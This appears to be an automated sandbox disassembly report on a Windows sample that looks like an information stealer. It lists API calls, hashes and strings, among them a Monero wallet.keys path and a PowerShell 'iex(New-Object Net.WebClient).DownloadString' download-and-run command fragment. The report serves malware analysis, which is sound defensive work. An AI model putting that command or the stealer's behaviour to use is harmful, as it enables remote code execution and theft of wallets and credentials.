                          • Instruction ID: ae456c62bdfcf5af21c8cedeee4142de3fc2451b4c38a171609979dc8e66f395
                          • Opcode Fuzzy Hash: 4c5ffac09d6fd3a4bd475345e00912c61472599afd97f77ef8940a8a77965bbb
                          • Instruction Fuzzy Hash: 4541F6B110079C5EDB258B24DD85FFBBBE89F45708F1444E8E98A96182D3719A44CFA0
                          Function 00134780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcat.KERNEL32(?,00F0F2F0), ref: 001347DB
                            • Part of subcall function 00138DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00138E0B
                          • lstrcat.KERNEL32(?,00000000), ref: 00134801
                          • lstrcat.KERNEL32(?,?), ref: 00134820
                          • lstrcat.KERNEL32(?,?), ref: 00134834
                          • lstrcat.KERNEL32(?,00EFAA88), ref: 00134847
                          • lstrcat.KERNEL32(?,?), ref: 0013485B
                          • lstrcat.KERNEL32(?,00F0E2B0), ref: 0013486F
                            • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                            • Part of subcall function 00138D90: GetFileAttributesA.KERNEL32(00000000,?,00121B54,?,?,0014564C,?,?,00140E1F), ref: 00138D9F
                            • Part of subcall function 00134570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00134580
                            • Part of subcall function 00134570: RtlAllocateHeap.NTDLL(00000000), ref: 00134587
                            • Part of subcall function 00134570: wsprintfA.USER32 ref: 001345A6
                            • Part of subcall function 00134570: FindFirstFileA.KERNEL32(?,?), ref: 001345BD
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                          • String ID:
                          • API String ID: 2540262943-0
                          • Opcode ID: ddda5e63a6ba4a4f38276adb754c89717bc8fa9a427b2a9a09d68e8af4eaf7d2
                          • Instruction ID: ea1e99b02d30840362d1d9fa14daf5cb5d70c43a01c9439c2974faa814a2df8d
                          • Opcode Fuzzy Hash: ddda5e63a6ba4a4f38276adb754c89717bc8fa9a427b2a9a09d68e8af4eaf7d2
                          • Instruction Fuzzy Hash: 003150B290031867CB11FBA0DC85EED777CAB68704F404589B359A6081EFB4E6898F95
                          Function 00132C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                            • Part of subcall function 0013A9B0: lstrlen.KERNEL32(?,00F09838,?,\Monero\wallet.keys,00140E17), ref: 0013A9C5
                            • Part of subcall function 0013A9B0: lstrcpy.KERNEL32(00000000), ref: 0013AA04
                            • Part of subcall function 0013A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0013AA12
                            • Part of subcall function 0013A920: lstrcpy.KERNEL32(00000000,?), ref: 0013A972
                            • Part of subcall function 0013A920: lstrcat.KERNEL32(00000000), ref: 0013A982
                            • Part of subcall function 0013A8A0: lstrcpy.KERNEL32(?,00140E17), ref: 0013A905
                          • ShellExecuteEx.SHELL32(0000003C), ref: 00132D85
                          Strings
                          • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00132CC4
                          • <, xrefs: 00132D39
                          • ')", xrefs: 00132CB3
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00132D04
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                          • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          • API String ID: 3031569214-898575020
                          • Opcode ID: 51c3fe5f06991874ccb5634ab179cd56e66c9fc3634c6acf717f5eea90de708c
                          • Instruction ID: 1f653efa7ef9ba5802cf83ac7a8bd70726191e15505621ac67fc0fafead2f11a
                          • Opcode Fuzzy Hash: 51c3fe5f06991874ccb5634ab179cd56e66c9fc3634c6acf717f5eea90de708c
                          • Instruction Fuzzy Hash: 6241D371C50208AADB15FFA0C892FDDB774AF24300F904159F156B7191DF746A4ACF92
                          Function 00129E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                          Download Yara Rule
                          APIs
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00129F41
                            • Part of subcall function 0013A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0013A7E6
                            • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$AllocLocal
                          • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                          • API String ID: 4171519190-1096346117
                          • Opcode ID: b369296cfc4ee280100b222e13de4530963e1e4850369825526ebdd8134ae502
                          • Instruction ID: b749c9b9b6792fb8b66a3830b385676b102a66e5025676c4cb0a3df015646723
                          • Opcode Fuzzy Hash: b369296cfc4ee280100b222e13de4530963e1e4850369825526ebdd8134ae502
                          • Instruction Fuzzy Hash: D1616371A10258EFDB24EFA4DC96FED7775AF54700F408018F90A9F191EB746A05CB92
                          Function 00137E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00137E37
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00137E3E
                          • RegOpenKeyExA.ADVAPI32(80000002,00EFC2C0,00000000,00020119,?), ref: 00137E5E
                          • RegQueryValueExA.ADVAPI32(?,00F0E270,00000000,00000000,000000FF,000000FF), ref: 00137E7F
                          • RegCloseKey.ADVAPI32(?), ref: 00137E92
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID:
                          • API String ID: 3225020163-0
                          • Opcode ID: 06b96a86d5a162e464c726aafdf83aa3e7a5252136e4697dcc3443651ea50627
                          • Instruction ID: 300154db61fed61d19e809db2e72df4dc850fdf6d2aa0bd9902ab75fce717684
                          • Opcode Fuzzy Hash: 06b96a86d5a162e464c726aafdf83aa3e7a5252136e4697dcc3443651ea50627
                          • Instruction Fuzzy Hash: B7114CB1A44605EBDB15CF95DD49FBBBBBCEB48B10F108169F605A7280D7B468008FA2
                          Function 00139260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                          Download Yara Rule
                          APIs
                          • StrStrA.SHLWAPI(00F0F068,?,?,?,0013140C,?,00F0F068,00000000), ref: 0013926C
                          • lstrcpyn.KERNEL32(0036AB88,00F0F068,00F0F068,?,0013140C,?,00F0F068), ref: 00139290
                          • lstrlen.KERNEL32(?,?,0013140C,?,00F0F068), ref: 001392A7
                          • wsprintfA.USER32 ref: 001392C7
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpynlstrlenwsprintf
                          • String ID: %s%s
                          • API String ID: 1206339513-3252725368
                          • Opcode ID: 35c6f6106a1c9d0e4e9bec9876a6f96868925956e05c43a0bac584e2647c16b5
                          • Instruction ID: 86a98f583625c5b618b268ab2b6e73cdf4a448aadbb7c0f9171fee93ab068ee4
                          • Opcode Fuzzy Hash: 35c6f6106a1c9d0e4e9bec9876a6f96868925956e05c43a0bac584e2647c16b5
                          • Instruction Fuzzy Hash: D001C475500608FFCB05DFECC998EAE7BB9EB48354F148148F909AB244C771AA40DF91
                          Function 001212A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 001212B4
                          • RtlAllocateHeap.NTDLL(00000000), ref: 001212BB
                          • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 001212D7
                          • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 001212F5
                          • RegCloseKey.ADVAPI32(?), ref: 001212FF
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID:
                          • API String ID: 3225020163-0
                          • Opcode ID: ac2cdbd08c9c0633e1efab92d05b3640b5bdb05ab2118662d36a09c3678a89dd
                          • Instruction ID: a36c424e3eaaf22243e1c6843911a777a873b48900df1fd2852d0edd5e1e6329
                          • Opcode Fuzzy Hash: ac2cdbd08c9c0633e1efab92d05b3640b5bdb05ab2118662d36a09c3678a89dd
                          • Instruction Fuzzy Hash: E701E6B5A40208BBDB15DFD4DC49FAEB7BCEB48701F108155FA05A7280D6B5AA018F51
                          Function 00136630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                          Download Yara Rule
                          APIs
                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00136663
                            • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                            • Part of subcall function 0013A9B0: lstrlen.KERNEL32(?,00F09838,?,\Monero\wallet.keys,00140E17), ref: 0013A9C5
                            • Part of subcall function 0013A9B0: lstrcpy.KERNEL32(00000000), ref: 0013AA04
                            • Part of subcall function 0013A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0013AA12
                            • Part of subcall function 0013A8A0: lstrcpy.KERNEL32(?,00140E17), ref: 0013A905
                          • ShellExecuteEx.SHELL32(0000003C), ref: 00136726
                          • ExitProcess.KERNEL32 ref: 00136755
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                          • String ID: <
                          • API String ID: 1148417306-4251816714
                          • Opcode ID: 91d028ea6d15a0a9f71f547e20646773c34c5c56ac5f4215dbc249b30e0b85cb
                          • Instruction ID: fdfffda215cb85891a40217923aca1273a8847429ba9a7ce239df8179f56018a
                          • Opcode Fuzzy Hash: 91d028ea6d15a0a9f71f547e20646773c34c5c56ac5f4215dbc249b30e0b85cb
                          • Instruction Fuzzy Hash: 2D31F9B1801218ABDB15EB90DC96BDEB77CAF54300F804199F30A76191DFB46B49CF6A
                          Function 001387C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00140E28,00000000,?), ref: 0013882F
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00138836
                          • wsprintfA.USER32 ref: 00138850
                            • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateProcesslstrcpywsprintf
                          • String ID: %dx%d
                          • API String ID: 1695172769-2206825331
                          • Opcode ID: 81d3220d428f9d4711ee7d5b1c7c95793b67b4158b8a8c541b065ba9423faf7d
                          • Instruction ID: 16dc0a5fb5836bf62fb1bf70913f29efc7071231e27ea8c971d1295f403fb9bf
                          • Opcode Fuzzy Hash: 81d3220d428f9d4711ee7d5b1c7c95793b67b4158b8a8c541b065ba9423faf7d
                          • Instruction Fuzzy Hash: 7A2130B1A40604AFDB05DFD4DD49FAEBBB8FB48701F108119F605B7280C7B9A9008FA1
                          Function 00138D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0013951E,00000000), ref: 00138D5B
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00138D62
                          • wsprintfW.USER32 ref: 00138D78
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateProcesswsprintf
                          • String ID: %hs
                          • API String ID: 769748085-2783943728
                          • Opcode ID: 21f9ab62abf70cfea518c61373aa373181177b680eb8d43e5419c95b742db0eb
                          • Instruction ID: cc947b8b3be8f35db3bd43e1160cd6abd50b9e3d3e16206ebe1332f760c89b35
                          • Opcode Fuzzy Hash: 21f9ab62abf70cfea518c61373aa373181177b680eb8d43e5419c95b742db0eb
                          • Instruction Fuzzy Hash: DBE08670A40208BFC700DBD4DD09E597BBCEB45702F004054FD0A97240DAB16E008F52
                          Function 0012A260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                            • Part of subcall function 0013A9B0: lstrlen.KERNEL32(?,00F09838,?,\Monero\wallet.keys,00140E17), ref: 0013A9C5
                            • Part of subcall function 0013A9B0: lstrcpy.KERNEL32(00000000), ref: 0013AA04
                            • Part of subcall function 0013A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0013AA12
                            • Part of subcall function 0013A8A0: lstrcpy.KERNEL32(?,00140E17), ref: 0013A905
                            • Part of subcall function 00138B60: GetSystemTime.KERNEL32(00140E1A,00F0EC08,001405AE,?,?,001213F9,?,0000001A,00140E1A,00000000,?,00F09838,?,\Monero\wallet.keys,00140E17), ref: 00138B86
                            • Part of subcall function 0013A920: lstrcpy.KERNEL32(00000000,?), ref: 0013A972
                            • Part of subcall function 0013A920: lstrcat.KERNEL32(00000000), ref: 0013A982
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0012A2E1
                          • lstrlen.KERNEL32(00000000,00000000), ref: 0012A3FF
                          • lstrlen.KERNEL32(00000000), ref: 0012A6BC
                            • Part of subcall function 0013A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0013A7E6
                          • DeleteFileA.KERNEL32(00000000), ref: 0012A743
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
